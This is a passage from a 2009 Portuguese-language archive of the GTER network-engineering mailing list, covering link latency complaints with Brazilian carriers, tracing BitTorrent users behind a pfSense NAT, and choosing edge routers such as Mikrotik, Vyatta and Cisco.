for?adas a >> >> >> > > 100Mb/s. Na verdade essa hist?ria >> >> >> > remonta h? anos quando existia um bug na >> >> >> > > >> >> >> > negocia??o de alguns equipamentos que faziam os mesmos >> >> >> > negociarem como >> >> >> > > half. >> >> >> > > Isso acabou e s? sobrou a >> >> >> > lenda. >> >> >> > > >> >> >> > > A regra ?: >> >> >> > > >> >> >> > > - >> >> >> > Auto-negocia??o com auto-negoci???o >> >> >> > > - Porta for?ada (sem autoneg) com Porta for?ada >> >> >> > > >> >> >> > > Qualquer outra combina??o trar? >> >> >> > problemas. >> >> >> > > >> >> >> > > Voc? colocou 1 notebook ligado >> >> >> > direto no link para eliminar problemas com >> >> >> > > sua rede, seu >> >> >> > firewall, etc? >> >> >> > > >> >> >> > > Grato. >> >> >> > > >> >> >> > > 2009/6/3 >> >> >> > Patrich Pizzolo >> >> >> > > >> >> >> > >> Bom dia >> >> >> > a todos, >> >> >> > >> gostaria de ter uma opini?o dos ilustres >> >> >> > colegas que integram esta >> >> >> > >> lista. >> >> >> > >> Tenho um link >> >> >> > de 10Mbps por fibra e ap?s um problema em um switch da GVT >> >> >> > >> meu >> >> >> > >> tempo de resposta entre a Eth do meu router e >> >> >> > a do router da gvt que s?o >> >> >> > >> interligados por uma fibra >> >> >> > est? chegando a picos de at? 946ms com uma >> >> >> > >> >> >> >> > m?dia >> >> >> > >> em torno de 10ms, isso com o link isolado e >> >> >> > j? testei com diversos >> >> >> > >> outros >> >> >> > >> routers e >> >> >> > sempre obtenho os mesmos tempos de resposta, definitivamente >> >> >> > >> >> >> >> > n?o >> >> >> > >> tenho problema nesta ponta. Possuo um outro link >> >> >> > com a BrT e est? tudo >> >> >> > >> normal com tempo de resposta >> >> >> > excelente sem nenhuma varia??o deste tipo. >> >> >> > >> >> >> >> > Estou nesta situa??o h? 7 dias e o pessoal da >> >> >> > operadora insiste em dizer >> >> >> > >> que >> >> >> > >> est? >> >> >> > tudo normal. J? nem aguento mais falar com eles... >> >> >> > >> >> >> >> > >> Algu?m tem alguma id?ia? >> >> >> > >> >> >> >> > >> No momento estou pensando em acionar e cancelar o link. >> >> >> > >> >> >> > Caro, >> >> >> > >> >> >> > Tivemos o mesmo problema algum tempo atras com a >> >> >> > GVT. Depois de muitos testes e alegarem que nossos servidores >> >> >> > estavam mal >> >> >> > configurados e n?o terem resultados positivos com esta >> >> >> > afirma??o, trocaram nossa porta no Switch deles, resolvendo >> >> >> > nosso problema. >> >> >> > >> >> >> > OBS: Alegaram que a vlan estava com uma >> >> >> > configura??o errada, ocasionado tais problemas. >> >> >> > >> >> >> > >> >> >> > >> >> >> > >> >> >> >> > >> Abra?os, >> >> >> > >> >> >> >> > Obrigado! >> >> >> > >> -- >> >> >> > >> gter list >> >> >> > https://eng.registro.br/mailman/listinfo/gter >> >> >> > >> >> >> >> > > >> >> >> > -- >> >> >> > > gter list https://eng.registro.br/mailman/listinfo/gter >> >> >> > > >> >> >> > >> >> >> > >> >> >> > -- >> >> >> > >> >> >> > >> >> >> > -- >> >> >> > gter list https://eng.registro.br/mailman/listinfo/gter >> >> >> > >> >> >> >> >> >> >> >> >> >> >> >> -- >> >> >> Abra?os, >> >> >> >> >> >> Patrich Pizzolo >> >> >> IT Coordinator >> >> >> +55-48-9944-9090 >> >> >> +55-47-8407-7768 >> >> >> pizzolo at gmail.com >> >> >> Skype: pizzolo_br >> >> >> MSN: patrich_pizzolo at hotmail.com >> >> >> SL: Xpiz Beam >> >> >> Taikodom: Deathwing_br >> >> >> -- >> >> >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> >> >> >> > >> >> > >> >> > >> >> > -- >> >> > Andr? Costa >> >> > Chief Executive Officer >> >> > Ib?ria Brasil Telecomunica??es >> >> > (71) 2223-9026 / 7811-5816 >> >> > NEXTEL 55*91*9228 >> >> > -- >> >> > gter list https://eng.registro.br/mailman/listinfo/gter >> >> -- >> >> gter list https://eng.registro.br/mailman/listinfo/gter >> > >> > _________________________________________________________________ >> > Show them the way! Add maps and directions to your party invites. >> > http://www.microsoft.com/windows/windowslive/products/events.aspx >> > -- >> > gter list https://eng.registro.br/mailman/listinfo/gter >> > >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter > > _________________________________________________________________ > Show them the way! Add maps and directions to your party invites. > http://www.microsoft.com/windows/windowslive/products/events.aspx > > ------------------------------ > > -- > gter digest list https://eng.registro.br/mailman/listinfo/gter > > End of gter Digest, Vol 75, Issue 25 > ************************************ From marconipp at hotmail.com Fri Jun 5 18:31:11 2009 From: marconipp at hotmail.com (Marconi Pereira) Date: Fri, 5 Jun 2009 21:31:11 +0000 Subject: [GTER] =?windows-1252?q?Embratel_e_Telef=F4nica?= In-Reply-To: References: Message-ID: Link Embratel. A m?dia de lat?ncia no backbone internacional aumentou bastante. Era uma m?dia de 75, 76ms. Desde o dia 21 de maio que a lat?ncia aumentou para 108 ms e atingiu picos de 115 ms. At? agora n?o diminuiu. Tem que recorrer ao hist?rico e ver o que aconteceu no dia 21 (numa vis?o global). Do dia 5 ao dia 20 de maio, a perda de pacotes no backbone internacional ficou em constantes 33,45%/dia, uma ENORMIDADE! Do dia 21 pra frente (coincidentemente ao aumento de lat?ncia), a perda caiu pra menos de 2,5%, ou seja, m?dia normal. Sei n?o, o neg?cio t? meio esquisito. []s M. ---------------------------------------- > From: security at neogrid.com > To: gter at eng.registro.br > Date: Fri, 5 Jun 2009 17:47:50 -0300 > Subject: [GTER] Embratel e Telef?nica > > Boa tarde, > > Algu?m com links MPLS Embratel e/ou FRAME RELAY Telef?nica notou alguma perda de pacotes, intermit?ncia nos ?ltimos dias? Hoje principalmente? > > Att, > > Dilson. > > -- > gter list https://eng.registro.br/mailman/listinfo/gter _________________________________________________________________ Windows Live? SkyDrive?: Get 25 GB of free online storage. http://windowslive.com/online/skydrive?ocid=TXT_TAGLM_WL_SD_25GB_062009 From rafaelhfaria at cenadigital.com.br Fri Jun 5 15:19:41 2009 From: rafaelhfaria at cenadigital.com.br (Rafael Henrique Faria) Date: Fri, 5 Jun 2009 15:19:41 -0300 Subject: [GTER] Log de P2P Message-ID: <10bf7ef00906051119h5bcca3a5x51f7d3ed3a5f71fe@mail.gmail.com> Boa tarde lista. Estamos com um problema na identifica??o do uso de programas P2P, mais precisamente no protocolo Bittorrent. Temos diversos usu?rios atr?s de um NAT. E quando recebemos notifica??es de abuso de copyright, o IP reportado ? sempre o do gateway. Tamb?m temos registro de todos os usu?rios conectados ao NAT na faixa de hor?rio da reclama??o. Por?m n?o temos como saber qual desses usu?rios que estava fazendo o compartilhamento do arquivo via bittorrent. Uma possibilidade que eu estava tentando analisar, seria o uso de algum cache de p2p, mas que esse cache gera-se log de tudo que est? passando atrav?s dele. Fazer bloqueio por portas, ? dif?cil pois o pr?prio bittorrent acaba usando outras portas livres, e as vezes at? a 80. J? me recomendaram o netflow, por?m o mesmo gera muita informa??o. E continua dif?cil fazer a identifica??o pelo mesmo. O NAT em quest?o ? um pfSense. Qualquer sugest?o ? bem-vinda. Agrade?o a todos. -- Rafael Henrique da Silva Faria Assistente de Inform?tica II Faculdade de Ci?ncias e Letras - Campus de Araraquara Universidade Estadual Paulista From rubensk at gmail.com Sat Jun 6 16:21:25 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sat, 6 Jun 2009 16:21:25 -0300 Subject: [GTER] Log de P2P In-Reply-To: <10bf7ef00906051119h5bcca3a5x51f7d3ed3a5f71fe@mail.gmail.com> References: <10bf7ef00906051119h5bcca3a5x51f7d3ed3a5f71fe@mail.gmail.com> Message-ID: <6bb5f5b10906061221s50b36e2ahb1cad864a00afc4b@mail.gmail.com> > Temos diversos usu?rios atr?s de um NAT. E quando recebemos > notifica??es de abuso de copyright, o IP reportado ? sempre o do > gateway. Consulte seu advogado(a) sobre a necessidade ou n?o de responder ou encaminhar essas notifica??es no Brasil, pois n?o me parece que essas notifica??es tenham valor legal da forma com quem est?o sendo feitas. > Tamb?m temos registro de todos os usu?rios conectados ao NAT na faixa > de hor?rio da reclama??o. Por?m n?o temos como saber qual desses > usu?rios que estava fazendo o compartilhamento do arquivo via > bittorrent. Esse problema ? mais gen?rico do que P2P, e se extende a acessos que possam estar infringindo leis, atacando outras redes etc. Uma possibilidade ? fazer NAT 1:1 entre os usu?rios ativos, assim voc? mant?m propriedades do NAT que j? usa hoje (com tudo de bom e de ruim), mas tem capacidade de correlacionar den?ncias a usu?rios. Rubens From jarruda-gter at jarruda.com Sat Jun 6 16:46:02 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Sat, 06 Jun 2009 15:46:02 -0400 Subject: [GTER] Log de P2P In-Reply-To: <10bf7ef00906051119h5bcca3a5x51f7d3ed3a5f71fe@mail.gmail.com> References: <10bf7ef00906051119h5bcca3a5x51f7d3ed3a5f71fe@mail.gmail.com> Message-ID: <4A2AC77A.9050403@jarruda.com> Rafael Henrique Faria wrote: > Boa tarde lista. > > Estamos com um problema na identifica??o do uso de programas P2P, mais > precisamente no protocolo Bittorrent. > > Temos diversos usu?rios atr?s de um NAT. E quando recebemos > notifica??es de abuso de copyright, o IP reportado ? sempre o do > gateway. > Tamb?m temos registro de todos os usu?rios conectados ao NAT na faixa > de hor?rio da reclama??o. Por?m n?o temos como saber qual desses > usu?rios que estava fazendo o compartilhamento do arquivo via > bittorrent. > > Uma possibilidade que eu estava tentando analisar, seria o uso de > algum cache de p2p, mas que esse cache gera-se log de tudo que est? > passando atrav?s dele. > Fazer bloqueio por portas, ? dif?cil pois o pr?prio bittorrent acaba > usando outras portas livres, e as vezes at? a 80. > > J? me recomendaram o netflow, por?m o mesmo gera muita informa??o. E > continua dif?cil fazer a identifica??o pelo mesmo. > Quem quer que tenha indicado Netflow para identificar P2P, nao parece estar correto. So consigo imaginar mesmo se quando reportarem o IP da violacao para voces, reportarem tambem o IP do'outro lado' (da conexao), ou os port numbers do seu lado, ja que voce esta multiplexando varios hosts atras de um mesmo IP. > O NAT em quest?o ? um pfSense. > > Qualquer sugest?o ? bem-vinda. > > Agrade?o a todos. > From rubensk at gmail.com Sat Jun 6 16:52:16 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sat, 6 Jun 2009 16:52:16 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> Message-ID: <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> 2009/6/5 Gustavo Santos : > HP ML 110 G5 ( mais barato e mais eficiente) com interfaces hp intel gigabit > pci-express. > Eu me decepcionei um pouco com a rb1000 quando se utiliza centenas de queues > e filtros. Eu acredito que a limita??o de centenas de queues e filtros seja intr?nseca ao Mikrotik e ao kernel Linux que ele roda. Possivelmente uma reestrutura??o com endere?amento agregado e PCQ melhorasse a performance, com qualquer hardware suportado pelo MT. Rubens From gustkiller at gmail.com Sat Jun 6 16:45:40 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 6 Jun 2009 16:45:40 -0300 Subject: [GTER] roteador de borda In-Reply-To: <200906051421.41166.herbert@scw.net.br> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <200906051421.41166.herbert@scw.net.br> Message-ID: <276fbe8b0906061245s1ee54bb6l88ad317716f7e67a@mail.gmail.com> Servidor HP ml110 x86, intel xeon dual core 2.66ghz, 1gb ram , Interfaces Intel gigabit pci-express. sem bonding. 2 sess?es ebgp e 1 sessao ibgp . o hardware se comporta muito bem com pico de 35% de Cpu , media em 26% . Algumas centenas de queues, e dezenas de filtros. Funciona , funciona e continua funcionando. O uptime das sess?es bgp ? o mesmo do servidor. E de vez enquanto testes para ver se a redund?ncia est? funcionando. 2009/6/5 Herbert Faleiros > On Fri 05 Jun 2009 08:55:33 Gustavo Santos wrote: > > Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. > > x86, mipsbe, mipsle? Caso x86 alguma placa deles ou em PC? E se n?o for > abusar > muito, ainda em x86, quais s?o os NICs utilizados (t? usando bonding), RAM > (BGP full?) e como o hardware se comporta (processamento, etc). > > -- > Herbert > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From gustkiller at gmail.com Sat Jun 6 17:03:10 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 6 Jun 2009 17:03:10 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> Message-ID: <276fbe8b0906061303qdca9d47sed3103d9f6c75f94@mail.gmail.com> O problema ? que no nosso caso n?o poderiamos utilizar PCQ. Devido a grande varia??o de velocidades de acesso entre outros parametros de prioridade e garantia, torna a utiliza??o do pcq invi?vel por aqui. Tirando este fator , existe outro como o valor exorbitante que ? cobrado por uma rb1000 aqui no Brasil, mas em pops menores a rb450 funciona muito bem , inclusive utilizando mpls que at? melhora a performance das rb450. J? teve caso de pop consumir em media 40 50% de cpu cair para menos de 25% utilizando mpls em conjunto com o ospf. 2009/6/6 Rubens Kuhl > 2009/6/5 Gustavo Santos : > > HP ML 110 G5 ( mais barato e mais eficiente) com interfaces hp intel > gigabit > > pci-express. > > Eu me decepcionei um pouco com a rb1000 quando se utiliza centenas de > queues > > e filtros. > > Eu acredito que a limita??o de centenas de queues e filtros seja > intr?nseca ao Mikrotik e ao kernel Linux que ele roda. > Possivelmente uma reestrutura??o com endere?amento agregado e PCQ > melhorasse a performance, com qualquer hardware suportado pelo MT. > > > Rubens > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From herbert at scw.net.br Sat Jun 6 17:09:19 2009 From: herbert at scw.net.br (Herbert Faleiros) Date: Sat, 6 Jun 2009 17:09:19 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> References: <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> Message-ID: <200906061709.19211.herbert@scw.net.br> On Sat 06 Jun 2009 16:52:16 Rubens Kuhl wrote: > Possivelmente uma reestrutura??o com endere?amento agregado e PCQ > melhorasse a performance, com qualquer hardware suportado pelo MT. Os problemas que tive com queues no routerOS foram relacionados ? processamento e I/O (refiro-me ?s routerboards deles especificamente, tanto com mipsbe, mipsle e algumas x86). Sempre resolvi trocando por x86 (PC comum), em routerboard, assim como o Gustavo disse, com muitas regras (e se quiser pegar pesado, al?m das queues, com muitas de firewall, conntrack, etc, abre o bico em qualquer routerboard que testei). Mesmo em x86 com PC comum h? ainda a limita??o de uso de RAM, se n?o me engano n?o usa mais que 1 ou 2 GB em x86 comum (a RB1000 parece que consegue usar mais, em x86 gen?rico n?o descobri como fazer isso ainda). Aqui costumo usar o routerOS em MB's Intel (tem dado certo). -- Herbert From rubensk at gmail.com Sat Jun 6 18:21:25 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sat, 6 Jun 2009 18:21:25 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <276fbe8b0906061303qdca9d47sed3103d9f6c75f94@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> <276fbe8b0906061303qdca9d47sed3103d9f6c75f94@mail.gmail.com> Message-ID: <6bb5f5b10906061421ndb99103t5b3593e2c393ac9@mail.gmail.com> 2009/6/6 Gustavo Santos : > O problema ? que no nosso caso n?o poderiamos utilizar PCQ. Devido a grande > varia??o de velocidades de acesso entre outros parametros de prioridade e > garantia, torna a utiliza??o do pcq invi?vel por aqui. Esse tipo de diversidade raramente resiste a uma an?lise de Pareto... provavelmente 80% das queues s?o mape?veis nos dedos da m?o do Lula em quantidade de produtos, sendo que as outras tendem a ser quase que 1 cliente = 1 produto. Matar 80% das queues e um bom n?mero de regras de firewall fazendo marking j? deve ajudar bem. > Tirando este fator , > existe outro como o valor exorbitante que ? cobrado por uma rb1000 aqui no > Brasil, mas em pops menores a rb450 funciona muito bem , inclusive A RB450 ou a RB450G ? > utilizando mpls que at? melhora a performance das rb450. J? teve caso de pop > consumir em media 40 50% de cpu cair para menos de 25% utilizando mpls em > conjunto com o ospf. MPLS ajuda a n?o passar pela parte IP do kernel... provavelmente a utiliza??o combinada de L2 ou raw-L3 desse o mesmo efeito que voc? teve com o MPLS. Se voc? associar outros ganhos do MPLS conforme o MT for implementando (TE, FRR, L3 VPN) a? sim vai fazer diferen?a. Rubens From gustkiller at gmail.com Sat Jun 6 18:50:27 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 6 Jun 2009 18:50:27 -0300 Subject: [GTER] RES: roteador de borda In-Reply-To: <6bb5f5b10906061421ndb99103t5b3593e2c393ac9@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> <6bb5f5b10906061252o57a6f6at3b4675d6f8aa344a@mail.gmail.com> <276fbe8b0906061303qdca9d47sed3103d9f6c75f94@mail.gmail.com> <6bb5f5b10906061421ndb99103t5b3593e2c393ac9@mail.gmail.com> Message-ID: <276fbe8b0906061450h6a9aac5ei8813e96dfb2f82cf@mail.gmail.com> 2009/6/6 Rubens Kuhl > 2009/6/6 Gustavo Santos : > > O problema ? que no nosso caso n?o poderiamos utilizar PCQ. Devido a > grande > > varia??o de velocidades de acesso entre outros parametros de prioridade e > > garantia, torna a utiliza??o do pcq invi?vel por aqui. > > Esse tipo de diversidade raramente resiste a uma an?lise de Pareto... > provavelmente 80% das queues s?o mape?veis nos dedos da m?o do Lula em > quantidade de produtos, sendo que as outras tendem a ser quase que 1 > cliente = 1 produto. > > Matar 80% das queues e um bom n?mero de regras de firewall fazendo > marking j? deve ajudar bem. > Voc? me pegou rsrs. Na verdade ? que, como existem outras pessoas que tem que lidar com problema di?rios de alguns cliente , e como estes PCs tem bastante folga de Cpu, fica mais pr?tico pro primeiro nivel em modo somente leitura entra na lista de queues , ver o nome / numero do circuito clicar com o bot?o direito e executar um Torch. > > Tirando este fator , > > existe outro como o valor exorbitante que ? cobrado por uma rb1000 aqui > no > > Brasil, mas em pops menores a rb450 funciona muito bem , inclusive > > A RB450 ou a RB450G ? RB450 ( sem conntrack) est? indo muito bem com at? 25/30mbits de tr?fego rodando mpls/ospf ( isto com folga de cpu) Por falar em G sabe algum lugar que j? tem disponivel? Est? RB450G teoricamente une o util ao agrad?vel ( Cpu mais r?pida e mem?ria razo?vel). > > > > utilizando mpls que at? melhora a performance das rb450. J? teve caso de > pop > > consumir em media 40 50% de cpu cair para menos de 25% utilizando mpls em > > conjunto com o ospf. > > MPLS ajuda a n?o passar pela parte IP do kernel... provavelmente a > utiliza??o combinada de L2 ou raw-L3 desse o mesmo efeito que voc? > teve com o MPLS. Se voc? associar outros ganhos do MPLS conforme o MT > for implementando (TE, FRR, L3 VPN) a? sim vai fazer diferen?a. > Estou a princ?pio a marca??o de pacotes para defini??o de Classes de Servi?o ( CoS). Testei o L3 VPN ( performance muito superior ao EoIP) s? falta um pouco de tempo para testar os TE Tunnels. > > > Rubens > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From anjunior at gmail.com Sat Jun 6 20:15:09 2009 From: anjunior at gmail.com (Antonio Junior) Date: Sat, 6 Jun 2009 20:15:09 -0300 Subject: [GTER] RES: RES: roteador de borda In-Reply-To: <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> References: <5B42F6C6B43E4AC28C60AF0FF0EA4266@SUporteHerlon> <276fbe8b0906050455s5cd330bamfcaea10a4d78a06e@mail.gmail.com> <45C59D91582E40F2AEB3A622C0789A7C@toledoPC> <276fbe8b0906051055h5a788e7cme53467f1ab5a35c3@mail.gmail.com> Message-ID: <001b01c9e6fc$a86506b0$f92f1410$@com> Mas o HP ML 110 o processador ? Intel xeon. O mikrotik ? compat?vel com essa fam?lia de processador? Att, Antonio Junior -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Gustavo Santos Enviada em: sexta-feira, 5 de junho de 2009 14:55 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] RES: roteador de borda HP ML 110 G5 ( mais barato e mais eficiente) com interfaces hp intel gigabit pci-express. Eu me decepcionei um pouco com a rb1000 quando se utiliza centenas de queues e filtros. 2009/6/5 Toledo, Luis Carlos > RB1000 ? > > > -----Mensagem original----- > > De: gter-bounces at eng.registro.br > > [mailto:gter-bounces at eng.registro.br] Em nome de Gustavo Santos > > Enviada em: sexta-feira, 5 de junho de 2009 08:56 > > Para: Herlon Alcantara Matos; Grupo de Trabalho de Engenharia > > e Operacao de Redes > > Assunto: Re: [GTER] roteador de borda > > > > Aqui, dois Mikrotiks com 155Mbits redundantes por vrrp. > > > > 2009/6/4 Herlon Alcantara Matos > > > > > Eu utilizo Vyatta. > > > > > > O Vyatta no meu caso com volume de trafego em torno de 30 MB ? > > > altamente estavel, interface simples e para uma quantidade desta de > > > link em uma maquina com boas placas de rede , > > preferencialmente INTEL, > > > voc? ira trabalhar tranquilamente. > > > > > > > > > Herlon > > > LCI Telecom > > > > > > > > > > > > -- > > > gter list https://eng.registro.br/mailman/listinfo/gter > > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter From Bruno at Openline.com.br Sat Jun 6 20:51:16 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 20:51:16 -0300 Subject: [GTER] roteador de borda Message-ID: <1244332276986.Bruno@Openline.com.br> Ol? --- Marconi Pereira escreveu: > Caros, > estou pesquisando sobre solu??o de roteador de borda para link entre > 100 e 155Mbps. > > 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + IOS?); Um Cisco 7200 com NPH-1G deve conseguir 200M > 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de QoS?) O vyatta community edition teve um problema recente de bug no quagga com ASN de 32 bits que deixou v?rias pessoas "fora" at? surgir uma solu??o. a vers?o paga me parece que teve resposta r?pida > 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a necessidade) ou freebsd com openbgd? eu uso aqui com sucesso Mikrotik rodando em RB1000 com tr?fego agregado de 200M e CPU com folga. BGP full com 2 peers e 2 com parcial. muita gente torce o nariz, mas eu peguei o projeto andando e ... tem funcionado a contento > Obrigado, > M. []s, !3runo Cabral From Bruno at Openline.com.br Sat Jun 6 20:56:50 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 20:56:50 -0300 Subject: [GTER] RES: roteador de borda Message-ID: <1244332610301.Bruno@Openline.com.br> Ol? --- Herbert Faleiros escreveu: > Mesmo em x86 com PC comum h? ainda a limita??o de uso de RAM, ? uma das coisas que n?o d? para entender no mikrotik :-( > se n?o me engano n?o usa mais que 1 ou 2 GB em x86 comum MT 2.9.x = 1GB m?x MT 3.x = 2GB m?x > (a RB1000 parece que consegue usar mais, 1.5GB na RB1000 > em x86 gen?rico n?o descobri como fazer isso ainda). se descobrir me conta > Aqui costumo usar o routerOS em MB's Intel (tem dado certo). a grande vantagem da RB1000 al?m do consumo de energia ? o tamanho. n?o tem por que um servidor de 1U ou 2U ser t?o longo se dentro do gabinete n?o tem quase nada :~) []s, !3runo From Bruno at Openline.com.br Sat Jun 6 20:59:06 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 20:59:06 -0300 Subject: [GTER] RES: roteador de borda Message-ID: <1244332746577.Bruno@Openline.com.br> --- Gustavo Santos escreveu: > > MPLS ajuda a n?o passar pela parte IP do kernel... provavelmente a > > utiliza??o combinada de L2 ou raw-L3 desse o mesmo efeito que voc? > > teve com o MPLS. Se voc? associar outros ganhos do MPLS conforme o MT > > for implementando (TE, FRR, L3 VPN) a? sim vai fazer diferen?a. > > Estou a princ?pio a marca??o de pacotes para defini??o de Classes > de Servi?o (CoS). Testei o L3 VPN (performance muito superior ao EoIP) > s? falta um pouco de tempo para testar os TE Tunnels. voc? j? tentou os tuneis do MT com um PC (linux ou freebsd) do outro lado? []s, !3runo Cabral From Bruno at Openline.com.br Sat Jun 6 21:16:26 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 21:16:26 -0300 Subject: [GTER] RES: Ainda problemas com a telefonica Message-ID: <1244333786010.Bruno@Openline.com.br> --- =?ISO-8859-1?Q?Rodrigo_Melga=E7o_Alves?= escreveu: > Sempre que ultrapassa o prazo determinado de solu??o de um problema > abrimos uma reclama??o na Anatel e ? comum a reclama??o na Anatel ser > fechada incorretamente pela CTBC como: "defeito ? no cliente e n?o na > CTBC" ou "j? est? resolvido" Isso ? bastante comum na Embratel e na OI. Aqui at? j? desenvolvemos um "m?todo" para tratar esse problema. No 5o dia ?til de cada reclama??o n?s ligamos NO FINAL DO EXPEDIENTE para a ag?ncia e informamos que n?o obtivemos contato com a operadora e que o problema continua Mesmo se estiver fechado, o ticket ? reaberto por nossa reclama??o E repetimos o processo de 5 em 5 dias at? a solu??o do problema Usualmente em 60 dias mais ou menos o ?ndice da reclama??o dispara e a tele finalmente conserta o problema O que vejo ? descaso por parte da ag?ncia quanto aos casos. Ela n?o liga para confirmar a informa??o da operadora. E essa de dar mais 5 dias de prazo (por ex. tem servi?os que tem 2 dias de prazo, se n?o fez em 5 ent?o deveria ser PADO _NA HORA_ tal qual querem fazer com empresas de SCM, e n?o empurrar com a barriga o caso) ? uma afronta ao direito do consumidor - j? esperei mais de 60 dias por solu??es simples como mudan?a de endere?o de linha telef?nica, imagine quem assina contrato de link e espera de 6 meses a 2 anos pela instala??o?! []s, !3runo Cabral From Bruno at Openline.com.br Sat Jun 6 21:17:53 2009 From: Bruno at Openline.com.br (Bruno at Openline.com.br) Date: Sat, 06 Jun 2009 21:17:53 -0300 Subject: [GTER] Log de P2P Message-ID: <1244333873536.Bruno@Openline.com.br> --- Rafael Henrique Faria escreveu: > Estamos com um problema na identifica??o do uso de programas P2P, mais > precisamente no protocolo Bittorrent. > > Temos diversos usu?rios atr?s de um NAT. E quando recebemos > notifica??es de abuso de copyright, o IP reportado ? sempre o do > gateway. > Uma possibilidade que eu estava tentando analisar, seria o uso de > algum cache de p2p, mas que esse cache gera-se log de tudo que est? > passando atrav?s dele. > Qualquer sugest?o ? bem-vinda. N?o leve a mal a pergunta mas j? pensou em dar IP p?blico din?mico a seus clientes? []s, !3runo Cabral From marconipp at hotmail.com Sat Jun 6 22:28:18 2009 From: marconipp at hotmail.com (Marconi Pereira) Date: Sun, 7 Jun 2009 01:28:18 +0000 Subject: [GTER] roteador de borda In-Reply-To: <1244332276986.Bruno@Openline.com.br> References: <1244332276986.Bruno@Openline.com.br> Message-ID: Opa Bruno, valeu pela dica!Eu acompanho a lista h? um tempo e ainda n?o vi threads esculhambando o mikrotik. Pelo visto ? um equipamento bastante confi?vel e utilizado em instala??es cr?ticas. Poder?amos afirmar, nesse caso, que Microtik tem o mesmo n?vel de confiabilidade que um cisco? trabalhei muitos anos com cisco e eu sempre dormi em paz. Sendo bem minimalista, a curva de aprendizado, instala??o, manuten??o, suporte e upgrade (ROI, pra ser mais pr?tico) do Mikrotik ? menor ou maior que o equipamento Cisco sugerido por voc?? []sM. ---------------------------------------- > From: Bruno at Openline.com.br > To: gter at eng.registro.br > Date: Sat, 6 Jun 2009 20:51:16 -0300 > Subject: Re: [GTER] roteador de borda > > Ol? > > --- Marconi Pereira escreveu: >> Caros, >> estou pesquisando sobre solu??o de roteador de borda para link entre >> 100 e 155Mbps. >> >> 1-qual roteador Cisco adequado (alguem tem ideia do preco do equip + IOS?); > > Um Cisco 7200 com NPH-1G deve conseguir 200M > >> 2-Vyatta? (eh estavel, eh facil de configurar, tem algum feature de QoS?) > > O vyatta community edition teve um problema recente de bug no quagga > com ASN de 32 bits que deixou v?rias pessoas "fora" at? surgir uma > solu??o. a vers?o paga me parece que teve resposta r?pida > >> 3-servidor dell com quagga? (nao rodo BGP, mas pode surgir a necessidade) > > ou freebsd com openbgd? > > eu uso aqui com sucesso Mikrotik rodando em RB1000 com tr?fego > agregado de 200M e CPU com folga. BGP full com 2 peers e 2 > com parcial. muita gente torce o nariz, mas eu peguei o projeto > andando e ... tem funcionado a contento > >> Obrigado, >> M. > > []s, !3runo Cabral > > -- > gter list https://eng.registro.br/mailman/listinfo/gter _________________________________________________________________ Lauren found her dream 